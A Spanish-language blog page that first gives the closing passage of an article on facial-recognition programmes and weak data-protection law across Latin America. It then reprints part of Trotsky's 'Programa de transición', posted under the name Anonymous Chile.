La falta de disposición para entregar información de cuestiones tan básicas como los proveedores de la tecnología que se está utilizando impide incluso hacerse una idea general respecto a la calidad de la herramienta en uso. Y es que no todos los sistemas de reconocimiento facial son iguales: las pruebas realizadas por la Metropolitan Police de Londres entre 2016 y 2018 arrojaron una taza de falsos positivos del 96%. Si alguna iniciativa local considerara usar la misma tecnología sería importante saberlo.

En ese sentido, el caso boliviano es diferente. Presentado a fines de agosto y catalogado por el Ministro de Gobierno, Carlos Romero, como el programa de seguridad ciudadana más moderno de todo el continente, Bol-110 es un ambicioso proyecto de adquisición de tecnologías de vigilancia “que van a estar en todo: en escuelas, taxis, hospitales”, explica Hugo Miranda de Internet Bolivia.

Aquí, la tecnología está a cargo de la empresa estatal china CEIEC, responsable también de la infraestructura del programa ECU-911 en Ecuador. Coincidentemente, el financiamiento viene también por parte del Banco Nacional de China, Eximbak, que facilitó a Bolivia la suma de 105 millones de dólares para poner en marcha Bol-110. Y aunque el proyecto no alcanzó a ser aprobado por el Poder Legislativo antes de la elección presidencial del 20 de octubre, los equipos ya fueron adquiridos.

“No es regular, no debería haber sucedido algo así, porque no tiene sentido comprar equipos que luego no se sabe cómo se van a utilizar. Pero como la voluntad estaba depositada sobre todo en el financiador, entonces pueden comenzar a hacer los procesos y luego darse cuenta de que necesitan un marco legal; me da la impresión de que eso es lo que ha sucedido. Probablemente incluso – estoy ahora especulando – había una necesidad de comprar en esta gestión esos equipos. Y, paralelamente, han ido proyectando la ley; y eso, como toma más tiempo, está saliendo retrasado”, explica Eliana Quiroz de Internet Bolivia.

A pesar del incierto futuro político del país, Quiroz cree que el programa difícilmente será abandonado: es un proyecto hecho para la policía, que ha tenido un rol prominente en el proceso del nuevo gobierno transitorio. Uno de los aspectos más llamativos sobre Bol-110 es que propone un ejercicio de coordinación mayúsculo de instituciones públicas y privadas relacionadas a la atención de urgencias, incidentes, emergencias y desastres, que incluye a la Policía, el sistema de salud, la Defensa Civil y Bomberos. Mediante un mandato de interoperabilidad, estas instituciones están obligadas a compartir información con el programa, por lo que su alcance se expande de manera bastante amplia a lo largo de todo el sistema social.

En ese sentido, Quiroz explica que Bolivia carece de una ley de protección de datos personales que restrinja el modo en que los datos puedan ser utilizados. “La policía depende del Ministerio de Gobierno y el Ministerio tiene, por mandato, la seguridad ciudadana. No hay -que yo sepa- ninguna restricción para utilización de esta tecnología y, me atrevería a decir, que tiene toda la posibilidad, la capacidad y el mandato de hacerlo. El problema es que no tiene el marco legal de protección de datos, porque eso no existe en Bolivia. Tenemos solamente articulado en la Constitución Política del Estado acerca de privacidad, que es muy genérico”.

Esto no es del todo inusual. Aunque la mayoría de los países latinoamericanos en los cuales se ha implementado o existe un proyecto relativo al reconocimiento facial tienen leyes de protección a los datos personales, en la mayoría no existe una mención explícita a los datos biométricos ni su tratamiento, lo cual no necesariamente implica que carezcan de resguardo legal.

Para el caso argentino, Eduardo Ferreyra puntualiza: “La ley no establece expresamente ninguna disposición sobre datos biométricos, pero sí establece una disposición de datos sensibles, y nosotros de ADC creemos que claramente los datos biométricos entran en la definición de datos sensibles, que es información que revele cuestiones básicas de la identidad de una persona. Aparte, el derecho a la privacidad es derecho constitucional argentino y la Corte Suprema y distintos tribunales han dicho que tiene fuerte carácter expansivo, por lo cual, si bien expresamente no lo dice, está claro que pertenece a un dato sensible”.

Una cuestión similar ocurre en Chile, donde los datos sensibles están sujetos al más alto estándar de protección que establece la ley y solamente pueden ser tratados cuando la ley lo autorice, exista consentimiento del titular o sean datos necesarios para la determinación u otorgamiento de beneficios de salud que correspondan a sus titulares. Y aunque no cabe duda de que los datos biométricos califican como datos sensibles, ello no impidió que una cadena de centros comerciales implementara un sistema de reconocimiento facial con fines de seguridad en uno de sus malls a fines de 2018 y que anunciara su expansión a otras de sus locaciones en 2019.

La experiencia chilena es particular por una serie de razones. En primer lugar, porque en el caso del sistema de reconocimiento facial de Mall Plaza, se trata de una implementación privada sobre un espacio semi-público. En segundo lugar, porque el software utilizado por la cadena de centros comerciales fue testeado por la Policía de Investigaciones, arrojando una altísima taza de falsos positivos, que asciende al 90%.

Y en tercer lugar, porque el otro sistema de reconocimiento facial actualmente en funcionamiento no cumple funciones de seguridad, sino que busca vigilar la administración de un beneficio social. El sistema desplegado en la red de metro de la ciudad de Valparaíso busca controlar que los usuarios de tarjetas de tarifa reducida, estudiantes y personas de la tercera edad, no presten sus tarjetas a otras personas. No hay información respecto a las pérdidas monetarias que esta práctica significa para la red de metro, ni tampoco del costo de la implementación del sistema de reconocimiento facial.

Una cuestión similar ocurre en Brasil. En São Paulo se implementó hace dos años el uso de cámaras de reconocimiento facial en el sistema de transporte público, con la justificación de que ayudarían a evitar el fraude en el uso de beneficios sociales asociados al transporte. En estos dos años el sistema ha bloqueado más de 300 mil tarjetas supuestamente usadas indebidamente. Por otra parte, la municipalidad ha anunciado la suspensión total de las tarjetas anónimas y ha implementado medidas para obligar el registro de las tarjetas con datos de identificación únicos y residenciales. En una ciudad de las dimensiones de São Paulo, el bloqueo o imposibilidad de acceso a medios de transporte puede tener un gran impacto en la vida y el desarrollo de las personas, particularmente aquellas no registradas, como migrantes y las personas sin techo.

Mientras tanto, Argentina ha implementado un proyecto conocido como Sistema de Identidad Digital (SID), con el objetivo de simplificar y agilizar los trámites que realizan las personas con el Estado, permitiendo validar la identidad mediante el uso de reconocimiento facial. Las imágenes son contrastadas con la base de datos del Registro Nacional de las Personas (RENAPER), que contiene las fotografías de todas las personas ciudadanas y residentes en Argentina. ADC mira este desarrollo con bastante preocupación; como explica Eduardo Ferreyra “nos enteramos de casos de gente que no le funcionaba la identificación y no había otra alternativa para verificar identidad. La única respuesta era que prueben de nuevo”. Ante problemas de este tipo, que potencialmente podrían dejara a personas fuera de los programas sociales, producto de fallas en los sistemas de identificación, es necesaria la habilitación de mecanismos alternativos.

Por su parte, en Ecuador avanza una iniciativa del Ministerio de Inclusión Económica y Social, que busca reemplazar el método de registro de poblaciones específicas que usan los servicios del ministerio, particularmente niños, niñas, adolescentes, personas de tercera edad y personas con discapacidades, en condición de pobreza extrema. Por medio de un acuerdo ministerial, el proyecto busca reemplazar el método actual de registro por uno de reconocimiento facial.

“No existe información que de cuenta de cuáles son las deficiencias, las limitaciones y las debilidades del método actual de registro que justifique que sea reemplazado por uno de reconocimiento facial. La información que tenemos es limitadísima”, explica Valeria Betancourt, coordinadora del Programa de políticas de información y comunicación de la Asociación para el Progreso de las Comunicaciones, APC.

Respecto a los potenciales riesgos, Betancourt es clara: el sistema “Expone a la población más vulnerable a riesgos que son a todas luces desproporcionados. No solo por exacerbar las condiciones de discriminación con base a sesgos que tengan que ver con el color de la piel, prejuicios sociales, sino los riesgos a los que somete por el uso fraudulento, ilegítimo, político de los datos de estas personas”.

En ese sentido, vale la pena recordar un episodio reciente: en septiembre se conoció la filtración de 18 GB de datos pertenecientes a prácticamente la totalidad de los habitantes de Ecuador, incluyendo números de identificación y de teléfono, registros familiares y de trabajo. Para Betancourt, ese caso de muestra “que no hay capacidad en el sector público para hacer un manejo responsable, eficiente de los datos de los ciudadanos”. Más todavía cuando Ecuador no cuenta con una ley de protección de datos personales que asegure límites basados en el respeto a los derechos fundamentales respecto al uso y aplicación de estos sistemas.

Además del proyecto liderado por el Ministerio de Inclusión Económica y Social, existen actualmente en Ecuador otros dos proyectos que están intentando implementar tecnologías de reconocimiento facial. El primero de ellos busca generar un sistema de videovigilancia orientado a mejorar las condiciones de seguridad de la ciudad de Quito, utilizando a la capital como una experiencia piloto con intenciones de expandirse al resto del país. El segundo, es una iniciativa de la estrategia Ecuador Digital, que está liderada por el Ministerio de Telecomunicaciones y Sociedad de la Información, y que apunta a agilizar los procedimientos alrededor de los trámites en el sector público.

Respecto a las motivaciones detrás de estos proyectos, Betancourt señala que “se piensa que la implementación de estos sistemas de por sí va a resultar un incremento de la eficiencia en los servicios o que de por sí van a mejorar las condiciones de seguridad en los espacios públicos, cuando lo que hemos visto es que si se aplican en las condiciones en las que hemos referido resultaría mucho más problemático que parte de una solución. La implementación de estos sistemas sin una mirada de derechos humanos es terriblemente problemática”.

Esta es solo una muestra del modo en el cual las tecnologías de reconocimiento facial se están implementando por la región. No son los únicos: países como México y Brasil – que utilizó un sistema de reconocimiento facial para vigilar a los participantes de la más reciente edición del Carnaval de Río de Janeiro – están implementado sistemas de este tipo a diferentes escalas y con propósitos diversos, ya sea a nivel de gobierno central o local, e incluso a veces en manos de privados, como en el caso chileno. Y no sería del todo extraño que entre el momento en que se termine de escribir este texto y su posterior publicación, una nueva iniciativa haya sido anunciada en Perú, Panamá o Uruguay.

En el intertanto, la ADC ha introducido una Acción Declarativa de Inconstitucionalidad contra el Gobierno de la Ciudad de Buenos Aires por la resolución que introduce el sistema de reconocimiento facial. TEDIC, junto al Instituto de Derecho y Economía Ambiental (IDEA), presentó una acción de inconstitucionalidad contra las resoluciones que negaron las solicitudes de información sobre el sistema de reconocimiento facial. Por su parte, tanto en Bolivia como en Ecuador se están estudiando los siguientes pasos a seguir en la materia.

Programa de transición: la agonía del capitalismo y las tareas de la IV Internacional

Publicada el 05/12/2019 por Anonymous Chile

Las premisas objetivas de la revolución socialista

La situación política mundial del momento, se caracteriza, ante todo, por la crisis histórica de la dirección del proletariado.

La premisa económica de la revolución proletaria ha llegado hace mucho tiempo al punto más alto que le sea dado alcanzar balo el capitalismo. Las fuerzas productivas de la humanidad han cesado de crecer. Las nuevas invenciones y los nuevos progresos técnicos no conducen a un acrecentamiento de la riqueza material. Las crisis de coyuntura, en las condiciones de la crisis social de todo el sistema capitalista, aportan a las masas privaciones y sufrimientos siempre mayores. El crecimiento de la desocupación ahonda a su vez la crisis financiera del Estado y mina los sistemas monetarios vacilantes. Los gobiernos, tanto democráticos como fascistas, van de una quiebra a la otra.

La burguesía misma no ve una salida. En los países en que se vio obligada a hacer su última postura sobre la carta del fascismo marcha ahora con los ojos vendados hacia la catástrofe económica y militar. En los países históricamente privilegiados, vale decir, aquellos en que pueden aún permitirse el lujo de la democracia a cuenta de la acumulación nacional anterior (Gran Bretaña, Francia, Estados Unidos) todos los partidos tradicionales del capital se encuentran en un estado de confusión que raya, por momentos, con la parálisis de la voluntad. El “ New Deal,” pese al carácter resuelto que ostentaba en el primer período sólo representa una forma particular de confusión, posible en un país donde la burguesía ha podido acumular inmensas riquezas. La crisis actual que está lejos aún de haber completado su curso, ha podido demostrar ya que la política del “ New Deal ”, en los EE.UU. como la política del frente popular en Francia, no ofrece salida alguna del impasse económico.

El cuadro de las relaciones internacionales no tiene mejor aspecto. Bajo la creciente presión de ocaso capitalista los antagonismos imperialistas han alcanzado el límite más allá del cual los conflictos y explosiones sangrientas (Etiopía, España, Extremo Oriente, Europa Central…) deben confundirse infaliblemente en un incendio mundial. En verdad la burguesía percibe el peligro mortal que una nueva guerra representa para su dominación, pero es actualmente infinitamente menos capaz de prevenirla que en vísperas de 1914.

Las charlatanerías de toda especie según las cuales las condiciones históricas no estarían todavía “ maduras ” para el socialismo no son sino el producto de la ignorancia o de un engaño consciente. Las condiciones objetivas de la revolución proletaria no sólo están maduras sino que han empezado a descomponerse. Sin revolución social en un próximo período histórico, la civilización humana está bajo amenaza de ser arrasada por una catástrofe. Todo depende del proletariado, es decir, de su vanguardia revolucionaria La crisis histórica de la humanidad se reduce a la dirección revolucionaria.

El proletariado y su dirección

La economía, el Estado, la política de la burguesía y sus relaciones internacionales están profundamente afectadas por la crisis social que caracteriza la situación pre­-revolucionaria de la sociedad. El principal obstáculo en el camino de la transformación de la situación pre-revolucionaria en revolucionaria consiste en el carácter oportunista de la dirección proletaria, su cobardía pequeño-burguesa y la traidora conexión que mantiene con ella en su agonía.

En todos los países el proletariado está sobrecogido por una profunda inquietud. Grandes masas de millones de hombres vienen incesantemente al movimiento revolucionario, pero siempre tropiezan en ese camino con el aparato burocrático, conservador de su propia dirección.

El proletariado español ha hechos desde abril de 1931 una serie de tentativas heroicas para tomar en sus manos el poder y la dirección de los destinos de la sociedad. No obstante, sus propios partidos (social-demócratas, stalinistas, anarquistas y POUM) cada cual a su manera han actuado a modo de freno y han preparado así el triunfo de Franco.

En Francia, la poderosa ola de huelgas con ocupación de las fábricas, particularmente en junio de 1936, mostró bien a las claras que el proletariado estaba dispuesto a derribar el sistema capitalista. Sin embargo, las organizaciones dirigentes, socialistas, stalinistas y sindicalistas, lograron bajo la etiqueta del Frente Popular, canalizar y detener, por lo menos momentáneamente, el torrente revolucionario.

La marca sin precedentes de huelgas con ocupación de fábricas y el crecimiento prodigiosamente rápido de los sindicatos industriales en los EE.UU. (el movimiento de la C.I.O.) son la expresión más indiscutible de la aspiración más instintiva de los obreros americanos a elevarse a la altura de la misión que la historia les ha asignado. Sin embargo, aquí también las organizaciones dirigentes, incluso la C.I.O. de reciente creación, hacen todo lo que pueden para detener y paralizar la ofensiva revolucionaria de las masas.

El paso definitivo de la I.C. hacia el lado del orden burgués, su papel cínicamente contra-revolucionario en el mundo entero, particularmente en España, en Francia, en Estados Unidos y en los otros países “democráticos”, ha creado extraor­dinarias dificultades suplementarias al proletariado mundial. Bajo el signo de la revolución de octubre, la política conservadora de los “Frentes Populares” conduce a la clase obrera a la impotencia y abre el camino al fascismo.

Los “Frentes Populares” por una parte, el fascismo por otra, son los últimos recursos políticos del imperialismo en la lucha contra la revolución proletaria. No obstante, desde el punto de vista histórico, ambos recursos no son sino una ficción. La putrefacción del capitalismo continuará también bajo el gorro frigio en Francia como bajo el signo de la swástica en Alemania. Sólo el derrumbe de la burguesía puede constituir una salida.

La orientación de las masas está determinada, por una parte, por las condiciones objetivas del capitalismo en descomposición, y de otra, por la política de traición de las viejas organizaciones obreras. De estos dos factores el factor decisivo, es, por supuesto, el primero; las leyes de la historia son más poderosas que los aparatos burocráticos. Cualquiera que sea la diversidad de métodos de los social traidores (de la legislación “social” de Blum a las falsificaciones judiciales de Stalin), no lograrán quebrar la voluntad revolucionaria del proletariado. Cada vez en mayor escala, sus esfuerzos desesperados para detener la rueda de la historia demostrarán a las masas que la crisis de la dirección del proletariado, que se ha transformado en la crisis de la civilización humana, sólo puede ser resuelta por la IV Internacional.

El programa mínimo y el programa de transición

La tarea estratégica del próximo período -período pre-revolucionario de agitación , propaganda y organización- consiste en superar la contradicción entre la madurez de las condiciones objetivas de la revolución y la falta de madurez del proletariado y de su vanguardia (confusión y descorazonamiento de la vieja dirección, falta de experiencia de la joven). Es preciso ayudar a la masa, en el proceso de la lucha, a encontrar el puente entre sus reivindicaciones actuales y el programa de la revolución socialista. Este puente debe consistir en un sistema de reivindicaciones transitorias, partiendo de las condiciones actuales y de la conciencia actual de amplias capas de la clase obrera a una sola y misma conclusión: la conquista del poder por el proletariado.

La social-democracia clásica que desplegó su acción en la época del capitalismo progresivo, dividía su programa en dos partes independientes una de otra; el programa mínimo, que se limitaba a algunas reformas en el cuadro de la sociedad burguesa y el programa máximo, que prometía para un porvenir indeterminado el reemplazo del capitalismo por el socialismo. Entre el programa máximo y el programa mínimo no existía puente alguno. La social-democracia no tenía necesidad de ese puente, porque sólo hablaba de socialismo los días de fiesta.

La Internacional Comunista ha entrado en el camino de la social democracia en la época del capitalismo en descomposición, cuando a éste no le es posible tratar de reformas sociales sistemáticas, ni de la elevación del nivel de vida de las masas; cuando la burguesía retoma cada vez con la mano derecha el doble de los que diera con la izquierda (impuestos, derechos aduaneros, inflación «deflación», vida cara, desocupa­ción, reglamentación policíaca de las huelgas, etc.); cuando cualquier reivindicación seria del proletariado y hasta cualquier reivindicación progresiva de la pequeña burguesía, conducen inevitablemente más allá de los límites de la propiedad capitalista y del Estado burgués.

El objetivo estratégico de la IV Internacional no consiste en reformar el capitalismo, sino en derribarlo. Su finalidad política es la conquista del poder por el proletariado para realizar la expropiación de la burguesía. Sin embargo, la obtención de este objetivo estratégico es inconcebible sin la más cuidadosa de las actitudes respecto de todas las cuestiones de táctica, inclusive las pequeñas y parciales.

Todas las fracciones del proletariado, todas sus capas, profesionales y grupos deben ser arrastradas al movimiento revolucionario. Lo que distingue a la época actual, no es que exima al partido revolucionario del trabajo prosaico de todos los días, sino que permite sostener esa lucha en unión indisoluble con los objetivos de la revolución

La IV Internacional no rechaza las del viejo programa “mínimo” en la medida en que ellas han conservado alguna fuerza vital. Defiende incansablemente los derechos democráticos de los obreros y sus conquistas sociales, pero realiza este trabajo en el cuadro de una perspectiva correcta, real, vale decir, revolucionaria. En la medida en que las reivindicaciones parciales –“mínimum”- de las masas entren en conflicto con las tendencias destructivas y degradantes del capitalismo decadente -y eso ocurre a cada paso, la IV Internacional auspicia un sistema de reivindicaciones transitorias, cuyo sentido es el de dirigirse cada vez más abierta y resueltamente contra las bases del régimen burgués. El viejo “programa mínimo” es constantemente superado por el programa de transición cuyo objetivo consiste en una movilización sistemática de las masas para la revolución proletaria.

Escala móvil de los salarios y escala móvil de las horas de trabajo

En las condiciones del capitalismo en descomposición, las masas continúan viviendo la triste vida de los oprimidos, quienes, ahora más que nunca, están amenazados por el peligro de ser arrojados en abismo del pauperismo. Están obligados a defender su pedazo de pan ya que no pueden aumentarlo ni mejorarlo. No es posible ni necesario enumerar las diversas reivindicaciones parciales que surgen a cada rato de circunstancias concretas, nacionales, locales, profesionales. Pero dos calamidades económicas fundamentales, a saber: la desocupación y la carestía de la vida, exigen consignas y métodos generales de lucha.

La IV Internacional declara una guerra implacable a la política de los capitalistas, que es, en gran parte, la de sus agentes, los reformistas, tendiente a hacer recaer sobre los trabajadores todo el fardo del militarismo, de la crisis, del desorden de los sistemas monetarios y demás calamidades de la agonía capitalista. Reivindica el derecho al trabajo y una existencia digna para todos.

Ni la inflación ni la estabilización monetaria pueden servir de consignas al proletariado porque son las dos caras de una misma moneda. Contra la carestía de la vida que, a medida que la guerra se aproxima, se acentuará cada vez más, sólo es posible luchar con una consigna: la escala móvil de los salarios. Los contratos colectivos de trabajo deben asegurar el aumento automático de los salarios correlativamente con la elevación del precio de los artículos de consumo.

Bajo pena de entregarse voluntariamente a la degeneración, el proletariado no puede tolerar la transformación de una multitud creciente de obreros en desocupados crónicos, en menesterosos que viven de las migajas de una sociedad en descomposición. El derecho al trabajo es el único derecho que tiene el obrero en una sociedad fundada sobre la explotación. No obstante se le quita ese derecho a cada instante. Contra la desocupación, tanto de “estructura” como de “coyuntura” es preciso lanzar la consigna de la escala móvil de las horas de trabajo. Los sindicatos y otras organizaciones de masas deben ligar a aquellos que tienen trabajo con los que carecen de él, por medio de los compromisos mutuos de la solidaridad. El trabajo existente es repartido entre todas las manos obreras existentes y es así como se determina la duración de la semana de trabajo. El salario, con un mínimo estrictamente asegurado sigue el movimiento de los precios. No es posible aceptar ningún otro programa para el actual período de transición.

Los propietarios y sus abogados demostrarán “la imposibilidad de realizar” estas reivindicaciones. Los capitalistas de menor cuantía, sobre todo aquellos que marchan a la ruina, invocarán además sus libros de contabilidad. Los obreros rechazarán categóricamente esos argumentos y esas referencias. No se trata aquí del choque “normal” de intereses materiales opuestos. Se trata de preservar al proletariado de la decadencia, de la desmoralización y de la ruina. Se trata de la vida y de la muerte de la única clase creadora y progresiva y, por eso mismo, del porvenir de la humanidad. Si el capitalismo es incapaz de satisfacer las reivindicaciones que surgen infaliblemente de los males por él mismo engendrados, no le queda otra que morir. La “posibilidad” o la “imposibilidad” de realizar las reivindicaciones es, en el caso presente, una cuestión de relación de fuerzas que sólo puede ser resuelta por la lucha. Sobre la base de esta lucha, cualesquiera que sean los éxitos prácticos inmediatos, los obreros comprenderán, en la mejor forma, la necesidad de liquidar la esclavitud capitalista.

Sindicatos en la época de transición

En la lucha por las reivindicaciones parciales y transitorias, los obreros necesitan, ahora más que nunca, organizaciones de masa, ante todo sindicatos. El auge de los sindicatos en Francia y en los Estados Unidos es la mejor respuesta a las doctrinas ultra-izquierdistas que predicaban que los sindicatos estaban “fuera de época”.

Los Bolchevique Leninistas se encuentran en las primeras filas de todas las formas de lucha, aún allí donde se trata de los intereses de los más modestos de la clase obrera. Toman parte activa en la vida de los sindicatos de masa, preocupándose de robustecer y acrecentar su espíritu de lucha. Luchan implacablemente contra toda las tentativas de someter los sindicatos al estado burgués y de maniatar al proletariado con “el arbitraje obligatorio” y todas las demás formas de intervención policial, no sólo son fascistas sino también “democráticas”. Solamente sobre la base de ese trabajo es posible luchar con buen éxito en el seno de los sindicatos contra la burocracia reformista incluidos los stalinistas. Las tentativas sectarias de crear o mantener pequeños sindicatos “revolucionarios” como una segunda edición del partido, significa en el hecho la renuncia por la lucha por la dirección de la clase obrera. Hace falta plantear aquí como un principio inconmovible: el auto-aislamiento cobarde fuera de los sindicatos de masas, equivalente a la traición a la revolución, es incompatible con la pertenencia a la IV internacional.

Al mismo tiempo la IV Internacional rechaza y condena resueltamente todo fetichismo de los sindicatos, propio de los treadeunionistas y de los sindicalistas.

  1. Los sindicatos no tienen, y, por sus objetivos, su composición y el carácter de su reclutamiento, no pueden tener un programa revolucionario acabado; por eso no pueden sustituir al partido. La creación de partidos revolucionarios nacionales, secciones de la IV Internacional, es el objetivo central de la época de transición.
  2. Los sindicatos, aún los más poderoso, no abarcan más del 20 al 25 de la clase obrera y por otra parte, sus capas más calificadas y mejor pagadas. La mayoría más oprimida de la clase obrera no es arrastrada a la lucha sino episódicamente en los períodos de auge excepcional del movimiento obrero. En estos momentos es necesario crear organizaciones ad-hoc, que abarquen toda la masa en lucha los comités de huelga, los comités de fábrica, y en fin, los soviets.
  3. En tanto que organizaciones de las capas superiores del proletariado, los sindicatos, como lo atestigua toda la experiencia histórica, comprendida en ella la experiencia fresca aún de los sindicatos anarco-sindicalistas de España, desenvuelven poderosas tendencias a la conciliación con el régimen democrático burgués. En los períodos agudos de lucha de clases, los aparatos dirigentes de los sindicatos se esfuerzan por convertirse en amos del movimiento de masas para domesticarlo. Esto se produce ya en ocasión de simples huelgas, sobre todo con la ocupación de las fábricas, que sacuden los principios de la propiedad burguesa. En tiempo de guerra o de revolución, cuando la situación de la burguesía se hace particularmente difícil, los jefes de los sindicatos se transforman ordinariamente en ministros burgueses.

Por todo lo que antecede las secciones de la IV Internacional deben esforzarse constantemente no sólo en renovar el aparato de los sindicatos proponiendo atrevida y resueltamente en los momentos críticos nuevos líderes dispuestos a la lucha en lugar de funcionarios rutinarios y carreristas, sino también de crear en todos los casos en que sea posible, organizaciones de combate autónomas que respondan mejor a los objetivos de la lucha de masas contra la sociedad burguesa, sin arredrarse, si fuese necesario, frente a una ruptura abierta con el aparato conservador de los sindicatos. Si es criminal volver la espalda a las organizaciones de masas para contentarse con ficciones sectarias, no es menos criminal tolerar pasivamente la subordinación del movimiento revolucio­nario de las masas al contralor de pandillas burocráticas abiertamente reaccionarias o conservadoras disfrazadas de “progresistas”. El sindicato no es un fin en sí, sino sólo uno de los medios a emplear en la marcha hacia la revolución proletaria.

Los comités de fabrica

EI movimiento obrero de la época de transición no tiene un carácter regular e igual sino afiebrado y explosivo. Las consignas, lo mismo que las formas de organización, deben ser subordinadas a ese carácter del movimiento. Huyendo de la rutina como de la peste, la dirección debe prestar atención a la iniciativa de las masas.

Las huelgas con ocupación de fábricas, una de las más recientes manifestaciones de esta iniciativa, rebasan los límites del régimen capitalista normal. Independientemente de las reivindicaciones de los huelguistas, la ocupación temporaria de las empresas asesta un golpe al ídolo de la propiedad capitalista. Toda huelga de ocupación plantea prácticamente el problema de saber quién es el dueño de la fábrica: el capitalista o los obreros.

Si la ocupación promueve esta cuestión episódicamente, el comité de fábrica da a la misma una expresión organizada. Elegido por todos los obreros y empleados de la empresa, el comité de fábrica crea de golpe un contrapeso a la voluntad de la administración.

A la crítica reformista de los patrones del viejo tipo, los “patrones de derecho divino”, del género de Ford, frente a los “buenos” explotadores “democráticos”, nosotros oponemos la consigna de los comités de fábrica como centro de lucha contra unos y otros.

Los burócratas de los sindicatos se opondrán, por regla general, a la creación de comités, del mismo modo que se oponen a todo paso atrevido en el camino de la movilización de las masas. Sin embargo, su oposición será tanto más fácil de quebrar cuanto mayor sea la extensión del movimiento. Allí donde los obreros de la empresa están ya en los períodos “tranquilos” totalmente comprendidos en los sindicatos, el comité coincidirá formalmente con el órgano del sindicato, pero renovará su compo­sición y ampliará sus funciones. Sin embargo, el principal significado de los comités es el de transformarse en estados mayores para las capas obreras que, por lo general, el sindicato no es capaz de abarcar. Y es precisamente de esas capas más explotadas de donde surgirán los destacamentos más afectos a la revolución.

A partir del momento de la aparición del comité de fábrica, se establece de hecho una dualidad de poder. Por su esencia ella tiene algo de transitorio porque encierra en sí dos regímenes inconciliables: el régimen capitalista y el régimen proletario. La principal importancia de los Comités de Fábrica consiste precisamente en abrir un período pre-revolucionario, ya que no directamente revolucionario, entre el régimen burgués y el régimen proletario. Que la propaganda por los Comités de Fábrica no es prematura ni artificial, lo demuestra del mejor modo la ola de ocupación de fábricas que se ha desencadenado en algunos países. Nuevas olas de ese género son inevitables en un porvenir próximo. Es preciso iniciar una campaña en pro de los comités de fábricas para que los acontecimientos no se tomen de improviso.

El «secreto comercial» y el control obrero sobre la industria

El capitalismo liberal basado en la concurrencia y la libertad de comercio se ha eclipsado en el pasado. El capitalismo monopolizador que lo reemplazó, no solamente no ha reducido la anarquía del mercado, sino que, por el contrario, le ha dado un carácter particularmente convulsivo. La necesidad de un “control” sobre la economía, de una “dirección” estatal, de una “planificación” es reconocida ahora – al menos verbalmente – por casi todas las corrientes del pensamiento burgués y pequeño-burgués, desde el fascismo hasta la social-democracia. Para el fascismo se trata sobre todo de un pillaje “planificado” del pueblo con fines militares. Los social-demócratas tratan de desagotar el océano de la anarquía con la cuchara de una “planificación” burocrática. Los ingenieros y los profesores tratan de convertirse en tecnócratas. Los gobiernos democráticos tropiezan en sus tentativas tímidas de “reglamentación” con el sabotaje insuperable del gran capital.

El verdadero nexo entre explotadores y “controladores” democráticos se revela en el hecho de que los señores “reformadores” poseídos de una santa emoción, se detienen en el umbral de los trusts con sus “secretos” industriales y comerciales. Aquí reina el principio de “no intervención”. Las cuentas entre el capital aislado y la sociedad constituyen un secreto del capitalismo: la sociedad no tiene nada que ver con ellas. El “secreto” comercial se justifica siempre, como en la época del capitalismo liberal, por los intereses de la “concurrencia”. En realidad los trusts no tienen secretos entre sí. El secreto comercial de la época actual es un constante complot del capital monopolizador contra la sociedad. Los proyectos de limitación del absolutismo de los “patrones de derecho divino” seguirán siendo lamentables farsas mientras los propietarios privados de los medios sociales de producción puedan ocultar a los productores y, a los consumidores la mecánica de la explotación, del pillaje y del engaño. La abolición del “secreto comercial” es el primer paso hacia un verdadero control de la industria.

Los obreros no tienen menos derechos que los capitalistas a conocer los “secretos” de la empresa, de los trusts, de las ramas de las industrias, de toda la economía nacional en su conjunto. Los bancos, la industria pesada y los transportes centralizados deben ser los primeros sometidos a observación.

Los primeros objetivos del control obrero consisten en aclarar cuales son las ganancias y gastos de la sociedad, empezando por la empresa aislada, determinar la verdadera parte del capitalismo aislado y de los capitalistas en conjunto en la renta nacional, desenmascarar las combinaciones de pasillo y las estafas de los bancos y de los trusts; revelar, en fin, ante la sociedad el derroche espantoso de trabajo humano que resulta de la anarquía del capitalismo y de la exclusiva persecución de la ganancia.

Ningún funcionario del estado burgués puede llevar a cabo esa tarea, cualesquiera que sean los poderes de que fuera investido. El mundo entero ha observado la impotencia del presidente Roosevelt y del presidente del consejo León Blum frente al complot de las “60” o de las “200” familias de sus respectivos países. Para quebrar la resistencia de los explotadores se requiere la presión del proletariado. Los comités de fábrica y solamente ellos pueden asegurar un verdadero control sobre la producción llamando en su ayuda como consejeros y no como tecnócratas a los especialistas honestos y afectos al pueblo: contadores, estadísticos, ingenieros, sabios, etc…

En particular la lucha contra la desocupación es inconcebible sin una amplia y atrevida organización de “grandes obras públicas”. Pero las grandes obras no pueden tener una importancia durable y progresiva, tanto para la sociedad como para los desocupados, si no forman parte de un plan general, trazado para un período de varios años. En el cuadro de un plan semejante los obreros reivindicarán la vuelta al trabajo, por cuenta de la sociedad, en las empresas privadas cerradas a causa de la crisis. El control obrero en tales casos sería sustituido por una administración directa por parte de los obreros.

La elaboración de un plan económico, así sea el más elemental, desde el punto de vista de los intereses de los trabajadores y no de los explotadores, es inconcebible sin control obrero, sin que la mirada de los obreros penetre a través de los resortes aparentes y ocultos de la economía capitalista. Los comités de las diversas empresas deben elegir, en reuniones oportunas, comités de trusts, de ramas de la industria, de regiones económicas, en fin, de toda la industria nacional, en conjunto. En esa forma, el control obrero pasará a ser la escuela de la economía planificada. Por la experiencia del control, el proletariado se preparará para dirigir directamente la industria nacionalizada cuando la hora haya sonado.

A los capitalistas, especialmente aquellos de pequeña y mediana importancia que, a veces, proponen ellos mismos abrir sus libros de cuentas ante los obreros – sobre todo para demostrarles la necesidad de reducir los salarios – los obreros deberán responderles que lo que a ellos les interesa no es la contabilidad de los quebrados o de los semi-quebrados aislados, sino la contabilidad de todos los explotadores. Los obreros no pueden ni quieren adaptar su nivel de vida a los intereses de los capitalistas aislados convertidos en víctimas de su propio régimen. La tarea consiste en reconstruir todo el sistema de producción y de distribución sobre principios más racionales y más dignos. Si la abolición del secreto comercial es la condición necesaria de control obrero, ese control representa el primer paso en el camino de la dirección socialista de la economía.

La expropiación de ciertos grupos de capitalistas

El programa socialista de la expropiación, vale decir, de la destrucción política de la burguesía y de la liquidación de su dominación económica, no puede, en ningún caso, constituir un obstáculo en el presente período de transición, bajo diversos pretextos, a la reivindicación de la expropiación de ciertas ramas de la industria, vitalísima para la existencia nacional de los grupos más parasitarios de la burguesía.

Así, a las prédicas quejumbrosas de los señores demócratas sobre la dictadura de las “60” familias de los Estados Unidos o de las “200” familias de Francia nosotros oponemos la reivindicación de la expropiación de esos 60 o 200 señores feudales del capitalismo.

